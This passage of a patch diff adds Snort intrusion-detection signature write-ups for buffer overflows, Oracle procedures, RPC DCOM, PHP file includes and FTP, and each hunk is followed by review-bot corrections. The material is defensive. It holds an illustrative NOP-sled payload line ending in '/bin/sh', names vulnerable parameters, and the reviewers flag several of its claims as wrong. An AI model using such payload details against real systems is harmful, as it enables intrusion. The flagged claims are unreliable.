+
+--
+Summary:
+This event is generated when suspicious shell code is detected in
+network traffic.
+
+--
+Impact:
+Denial of Service (DoS) possible execution of arbitrary code.
+
+--
+Detailed Information:
+This event is generated when suspicious shell code is detected. Many
+buffer overflow attacks contain large numbers of NOOP instrucions to pad
+out the request. Other attacks contain specific shell code sequences
+directed at certain applications or services.
+
+The shellcode in question may also use Unicode encoding.
+
+--
+Affected Systems:
+	Any software running on x86 architecture.
+
+--
+Attack Scenarios:
+An attacker may exploit a DCERPC service by sending shellcode in the RPC
+data stream. Sending large amounts of data to the Microsoft Workstation
+service can cause a buffer overflow condition in the logging function
+thus presenting an attacker with the opportunity to issue a DoS attack
+or in some cases, to execute code of their choosing.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+False positives may be generated by binary file transfers.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Make sure the target host has all current patches applied and has the
+latest software versions installed.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
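Review bot: the Attack Scenarios paragraph is specific to the Microsoft Workstation service logging overflow while the rest of the hunk describes a generic x86 shellcode rule; either say this is one example of where such shellcode turns up or move it to the rule for that vulnerability. Fix "instrucions" and the missing punctuation in "Denial of Service (DoS) possible execution of arbitrary code". Because Detailed Information says the shellcode "may also use Unicode encoding", False Positives should mention UTF-16 text as well as binary transfers, and for a generic rule the Corrective Action should also tell the analyst to verify the destination service and inspect the payload rather than only "apply patches".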
--- /dev/null
+++ b/doc/signatures/2871.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2871
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_priority_nchar
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
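Review bot: the lines "vulnerability in the procedure alter_priority_nchar" / ". This procedure is included in" / "sys.dbms_repcat_conf." have a stray line break that leaves the period on its own line; join them into one sentence. "Oracle Oracle9i" repeats the vendor name. Ease of Attack "Simple." should carry the qualification the sid 2641 hunk in this same patch gives for the same family of bugs, that the attacker needs a valid database login to call the procedure; that belongs in Attack Scenarios too. Additional References is empty.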
--- /dev/null
+++ b/doc/signatures/1537.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1537
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
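Review bot: Affected Systems is empty and the hunk is generic boilerplate that never says what traffic sid 1537 matches; from Summary and Detailed Information the reader cannot tell which application or URI the event refers to. Name the application and the request pattern, list affected versions, and fix "ona web server".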
--- /dev/null
+++ b/doc/signatures/2081.txt
@@ -0,0 +1,78 @@
+Rule:
+
+--
+Sid:
+2081
+
+--
+Summary:
+number for the rpc service xfsmd
+
+--
+Impact:
+Intelligence gathering
+
+--
+Detailed Information:
+This may be an attacker probing for vulnerable versions of rpc services.
+In this case, the rpc service xfsmd.
+
+It is possible for an attacker to supply a meta character followed by
+any commands or code of his choosing to the xfsmd daemon.
+
+Due to a programming error, the service does not correctly check for the
+characters and they are not stripped from the request.
+
+The xfsmd daemon is not installed by default on IRIX systems but it is 
+part of an optional package.
+
+--
+Affected Systems:
+	IRIX 6.2
+	IRIX 6.3
+	IRIX 6.4
+	IRIX 6.5.x
+
+--
+Attack Scenarios:
+Exploits are widely available.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Patches are NOT available for this issue.
+
+Disable and remove the xfsmd daemon.
+
+Uprade to the latest non affected version of the operating system
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/5075
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0359
+
+SGI IRIX:
+ftp://patches.sgi.com/support/free/security/advisories/20020606-01-I
+
+--
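Review bot: the Summary is cut off; "number for the rpc service xfsmd" is the tail of a sentence, not a summary. Restore the full sentence describing the portmap request the rule matches. "Attack Scenarios: Exploits are widely available." belongs under Ease of Attack; Attack Scenarios should describe the injection Detailed Information mentions (a metacharacter followed by attacker commands sent to the daemon). Fix "Uprade". Corrective Action states "Patches are NOT available for this issue." while Additional References links an SGI advisory; confirm the two agree before this ships.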
--- /dev/null
+++ b/doc/signatures/2235.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+2235
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer 
+overflow in Trend Micro InterScan eManager.
+
+--
+Impact:
+Serious. Remote administrative access is possible.
+
+--
+Detailed Information:
+Versions of Trend Micro InterScan eManager suffer from a buffer overflow
+condition that can present an attacker with the opportunity to execute 
+arbitrary code of their choosing which could lead to remote access to 
+the server.
+
+--
+Affected Systems:
+	Trend Micro InterScan eManager 3.51
+
+--
+Attack Scenarios:
+If the buffer overflow condition is met, the attacker can run code of 
+their choosing on the affected host.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Disable the web interface
+
+Enable NTLM authentication for the administrative interface
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/3327
+
+--
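Review bot: Detailed Information repeats the Summary without saying which eManager component or request the overflow is in, or what the rule keys on, so an analyst cannot judge a hit; add the vulnerable request and parameter from the referenced Bugtraq entry. The Corrective Action items "Disable the web interface" and "Enable NTLM authentication for the administrative interface" are alternatives, not sequential steps; say so.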
--- /dev/null
+++ b/doc/signatures/491.txt
@@ -0,0 +1,63 @@
+Rule:  
+--
+Sid:
+491
+
+--
+Summary:
+This event is generated when a failed attempt to login to an FTP server
+is detected.
+
+--
+Impact:
+Unknown. Multiple events may indicate an attempt to enumerate accounts
+and passwords using brute force methodology.
+
+--
+Detailed Information:
+This event is generated when a failed attempt to login to an FTP server
+is detected.
+
+Multiple events may indicate an attempt to enumerate accounts
+and passwords using brute force methodology.
+
+--
+Affected Systems:
+	All FTP Servers
+ 
+--
+Attack Scenarios:
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Check FTP logs for access attempts.
+
+Disallow FTP access from sources external to the protected network.
+
+Consider using Secure Shell as a replacement for FTP services.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+RFC:
+http://www.faqs.org/rfcs/rfc959.html
+
+--
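Review bot: False Positives "None Known" is wrong for this rule in practice: every mistyped password by a legitimate user produces one of these events, and the Impact paragraph itself says only "Multiple events" are meaningful. State that and suggest thresholding (alert only after N failures from one source within a window) so the event stays useful. Attack Scenarios is empty; describe the brute-force account enumeration Impact mentions. "Consider using Secure Shell as a replacement for FTP services" should name SFTP or SCP, since ssh by itself is not a file transfer service.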
--- /dev/null
+++ b/doc/signatures/1261.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+1261
+
+--
+Summary:
+This event is genereated when an attempt to overflow the buffer of the
+IBM Program Database Name Server Daemon (PDNSD) is made.
+
+--
+Impact:
+Serious. System compromize presenting the attacker with the opportunity
+to gain remote access to the victim host or execute arbitrary code with
+the privileges of the superuser account.
+
+--
+Detailed Information:
+Some versions of IBM PDSND for AIX are vulnerable to a buffer overflow
+condition which can present the attacker with root privileges.
+
+
+Affected Systems:
+	PDSND versions 2 and 3
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Disable the PDSND daemon.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CIAC:
+http://www.ciac.org/ciac/bulletins/j-059.shtml
+
+--
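Review bot: the product name is inconsistent: the Summary says "IBM Program Database Name Server Daemon (PDNSD)" while Detailed Information, Affected Systems and Corrective Action say "PDSND"; pick one. The "--" separator before "Affected Systems:" is missing. Fix "genereated" and "compromize". "Attack Scenarios: Exploit scripts are available" is not a scenario; say what the attacker sends (an overlong request to the daemon) and what they obtain (root privileges, per Impact).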
--- /dev/null
+++ b/doc/signatures/2460.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2460
+
+--
+Summary:
+This event is generated when a host in your network that has Yahoo 
+Instant Messenger running requests to view a webcam listen to an audio 
+message of another Yahoo IM user. 
+
+--
+Impact:
+Possible policy violation.  Instant Messenger programs may not be 
+appropriate in certain network environments.
+
+--
+Detailed Information:
+This event indicates that a Yahoo IM user in your network is requesting 
+to view a webcam or listen to an audio message of another Yahoo IM user.
+While there are no known exploits associated with showing or viewing 
+webcams, it is possible that this activity is inappropriate in certain 
+environments.
+
+--
+Affected Systems:
+Any host running Yahoo Instant Messenger.
+
+--
+Attack Scenarios:
+No known attack scenarios.
+
+--
+Ease of Attack:
+No known attack scenarios.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+It may be possible for Yahoo IM traffic to use other ports than the 
+default expected ones.  
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or 
+implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+--
+Additional References:
+Yahoo Protocol
+http://www.cse.iitb.ac.in/~varunk/YahooProtocol.htm
+
+--
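Review bot: the Summary drops a word: "requests to view a webcam listen to an audio message" should read "requests to view a webcam or listen to an audio message", as Detailed Information has it. Since False Negatives notes that Yahoo IM may use non-default ports, Corrective Action could add blocking the IM service at the perimeter alongside the usage policy.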
--- /dev/null
+++ b/doc/signatures/2241.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+2241
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerablity in NetWin CWMail 2.7.
+
+--
+Impact:
+Serious. Execution of arbitrary code is possible.
+
+--
+Detailed Information:
+Certain versions of NetWin CWMail suffer from a buffer overflow 
+condition that can present an attacker with the opportunity to execute 
+code of their choosing on the server.
+
+--
+Affected Systems:
+	NetWin CWMail 2.7, a, b, c, d, f, i, j, k, l, m, n, o, p, q, s and t
+	
+--
+Attack Scenarios:
+The attacker would need to supply a large amount of characters to the
+"item=" parameter which could then cause the overflow condition to
+occur.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/4093
+
+--
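Review bot: the Affected Systems line "NetWin CWMail 2.7, a, b, c, d, f, i, j, k, l, m, n, o, p, q, s and t" is ambiguous; if these are version suffixes, write them out (2.7, 2.7a, 2.7b, ...). Fix "vulnerablity". The Summary and Detailed Information should name the "item=" parameter that Attack Scenarios says carries the overflow, since that is what the analyst will look for in the request.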
--- /dev/null
+++ b/doc/signatures/1617.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1617
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
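Review bot: the hunk is boilerplate that does not say which CGI application or request sid 1617 matches; Summary, Detailed Information and Affected Systems ("All systems running CGI applications") are all generic. Name the script and the request pattern, and fix "ona web server". The Attack Scenarios text is about authentication bypass, which is a different flaw from the command execution the second Detailed Information paragraph describes; keep whichever applies to this rule.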
--- /dev/null
+++ b/doc/signatures/1394.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+
+1394
+
+--
+Summary:
+This event is generated when an attempt is made to possibly overflow a buffer.
+
+The NOOP warning occurs when a series of NOOP (no operation) are found in a stream. Most buffer overflow exploits typically use NOOPs sleds to pad the code.
+
+--
+Impact:
+
+This might indicate someone is trying to use a buffer overflow exploit. 
+
+Full compromise of  system is possible if the exploit is successful.
+
+--
+Detailed Information:
+This rule detects a large number of consecutive NOOP instructions used in padding code. It's not specific to a particular service exploit, but rather used to try and detect buffer overflows in general. It is common for buffer overflow code to contain a large sequence of NOOP instructions as it increases the odds of successful execution of the useful shellcode. 
+
+--
+Affected Systems:
+
+	Any x86 programs.
+
+--
+Attack Scenarios:
+An attacker uses a buffer overflow exploit which contains the following payload:
+
+	90 90 90 90 90 90 90 90 90 90 /bin/sh
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+High, This event may be generated by applications such as ftp and http 
+when binary data is being transfered. 
+
+A false Positive can be generated if the snort sensor detects text from an IRC
+client or any other application that passes data plaintext. The event is
+generated if snort detects several (a) characters in a row - such as
+'aaaaaaaaaa'.
+
+--
+False Negatives:
+
+None known
+
+--
+Corrective Action:
+Apply a non-executable user stack patch to your kernel
+
+Secure programming/execution of a program
+
+Check the destination host and service to verify if any buffer overflow vulnerability exists.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Nawapong Nakjang (tony@ksc.net, tonie@thai.com)
+
+--
+Additional References:
+
+--
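Review bot: the hunk contradicts itself about which bytes the rule matches. Detailed Information and Attack Scenarios describe 0x90 sleds ("90 90 90 90 90 90 90 90 90 90 /bin/sh"), but False Positives says "The event is generated if snort detects several (a) characters in a row - such as 'aaaaaaaaaa'", which is 0x61, a different byte. State the byte pattern the rule actually looks for and make the example payload match it. Also fix "NOOPs sleds" and "transfered", remove the blank line between "Sid:" and "1394", and either expand "Secure programming/execution of a program" into an actionable step or drop it.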
--- /dev/null
+++ b/doc/signatures/3222.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3222
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
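Review bot: Additional References is empty although Corrective Action says "Apply the appropriate vendor supplied patches"; cite the Microsoft bulletin for the RPC DCOM vulnerability so the reader can find them. Fix "Expoit". The Attack Scenarios line "a request for a file with an overly long filename via a network share" needs a sentence tying it to DCOM (the filename is carried in the DCOM activation request over RPC), otherwise it reads like an SMB attack. The port-blocking advice should add that filtering 135, 139 and 445 at the perimeter does nothing for hosts already inside the network.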
--- /dev/null
+++ b/doc/signatures/2365.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+2365
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the PHP web application newsPHP.
+
+--
+Impact:
+Execution of arbitrary code on the affected system
+
+--
+Detailed Information:
+newsPHP contains a flaw such that it may be possible for an attacker
+to include code of their choosing by manipulating the variable LangFile when 
+making a GET or POST  request  to a vulnerable system.
+
+It may be possible for an attacker to execute that code with the
+privileges of the user running the webserver, usually root.
+
+--
+Affected Systems:
+	newsPHP newsPHP 216
+
+--
+Attack Scenarios:
+An attacker can make a request to an affected script and define their
+own path for the LangFile variable.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
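Review bot: "privileges of the user running the webserver, usually root" is wrong; web servers normally run as an unprivileged account (nobody, www-data, apache) precisely so that a flaw like this does not yield root. Say "with the privileges of the web server account". "newsPHP newsPHP 216" repeats the name, and "GET or POST  request  to" has doubled spaces. Detailed Information should say whether LangFile is abused with a remote URL or a local path, since the request the analyst will see differs. Additional References is empty.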
--- /dev/null
+++ b/doc/signatures/100000483.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000483
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Wheatblog" application running on a webserver. 
+Access to the file "view_links.php" using a remote file being passed as the 
+"wb_inc_dir" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "wb_inc_dir" parameter in the "view_links.php" script 
+used by the "Wheatblog" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Wheatblog
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
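Review bot: the third Detailed Information paragraph ("This event is generated when an attempt is made to gain unauthorized access to a CGI application ... validating the credentials of a client host") is authentication boilerplate that does not apply to a remote file include in "view_links.php" via "wb_inc_dir"; remove it, and likewise the Attack Scenarios sentence about supplying credentials. "may indicate that an exploitation attempt has been attempted" is redundant, and "ona web server" is a typo. Affected Systems should list the vulnerable Wheatblog versions.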
--- /dev/null
+++ b/doc/signatures/2641.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2641
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "drop_site_instantiate" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "refresh_template_name"
+variable to cause the overflow. The result could permit the attacker
+to gain escalated privileges and run code of their choosing. This
+attack requires an attacker to logon to the database with a valid
+username and password combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck629.html
+
+--
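Review bot: "make sure that the variable $ORACLE_PORTS is set to a value of "any"" gives an instruction without its reason; say why (presumably because Oracle on Windows can redirect client sessions to dynamically assigned ports, so a rule bound to the listener port misses the traffic). Ease of Attack "Simple." should be qualified by the Attack Scenarios statement that the attacker must "logon to the database with a valid username and password". "a Oracle database" should be "an Oracle database". Detailed Information names the procedure ("drop_site_instantiate") and Attack Scenarios names the parameter ("refresh_template_name"); state them together so the reader sees one is the procedure and the other its argument.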
--- /dev/null
+++ b/doc/signatures/1625.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid: 
+1625
+
+--
+Summary:
+This event is generated when activity relating to spurious ftp traffic is detected on the network.
+
+--
+Impact:
+Varies from information gathering to a serious compromise of an ftp server.
+
+--
+Detailed Information:
+FTP is used to transfer files between hosts. This event is indicative of spurious activity in FTP traffic between hosts.
+
+The event may be the result of a transfer of a known protected file or it could be an attempt to compromise the FTP server by overflowing a buffer in the FTP daemon or service.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using FTP.
+
+An attacker might utilize a vulnerability in an FTP daemon to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow access to FTP resources from hosts external to the protected network.
+
+Use secure shell (ssh) to transfer files as a replacement for FTP.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
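Review bot: the Affected Systems section is missing from this hunk, and the Summary and Detailed Information never say what "spurious ftp traffic" the rule matches; "transfer of a known protected file" and "overflowing a buffer" are different events with different responses. State the actual match (file name, command or pattern) and which of the two it is. The contributor line uses "brian.caswell@sourcefire.com" where every other hunk uses "bmc@sourcefire.com".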
--- /dev/null
+++ b/doc/signatures/2483.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2176
+
+
+--
+Summary:
+This event is generated when an attempt is made to shutdown a service via SMB. 
+
+--
+Impact:
+Serious.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to shutdown a service
+on a system using SMB across the network.
+
+--
+Affected Systems:
+	Microsoft Windows systems.
+
+--
+Attack Scenarios:
+An attacker may try to deny services to other users.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
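Review bot: the Sid in this hunk is "2176" but the file is doc/signatures/2483.txt; one of them is wrong and the documentation will be attached to the wrong rule. "Impact: Serious." says nothing; state what is lost (the stopped service, e.g. logging or antivirus being shut down ahead of further compromise, which is what "Check the host for signs of system compromise" implies). Detailed Information should also say whether the SMB service control request needs an authenticated session with service-control rights, since that decides whether the alert is triaged as an intrusion attempt or as evidence of an already compromised account.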
--- /dev/null
+++ b/doc/signatures/257.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+257
+
+--
+Summary:
+This event is generated when an attempt is made to determine the version
+of BIND being used on a DNS server.
+
+--
+Impact:
+Information gathering. This activity may indicate reconnaisance before 
+an impending attack.
+
+--
+Detailed Information: 
+A remote machine attempted to determine the version of BIND running on a
+nameserver.
+
+--
+Affected Systems:
+	All DNS nameservers
+ 
+--
+Attack Scenarios:
+As part of reconnaissance leading upto a potential intrusion attempt, an
+attacker may attempt to determine the BIND version that is in use so
+that a vulnerable version can be used as an attack vector.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disable the ability for untrusted (remote) machines to determine the named
+version.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by Jon Hart <warchild@spoofed.org>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
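Review bot: fix "reconnaisance" and "upto". Corrective Action "Disable the ability for untrusted (remote) machines to determine the named version" should say how: the "version" option in the options block of named.conf replaces the string BIND reports. False Positives "None Known" is too strong; inventory and monitoring tools legitimately query version.bind, so list that. Additional References is empty.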
--- /dev/null
+++ b/doc/signatures/1016.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+1016
+
+--
+Summary:
+This event is generated when an attempt is made to craft a URL containing a reference to the "/global.asa" file.
+
+--
+Impact:
+Intelligence gathering.  This attack may permit disclosure of the source code of global.asa file that is not normally available for viewing.
+
+--
+Detailed Information:
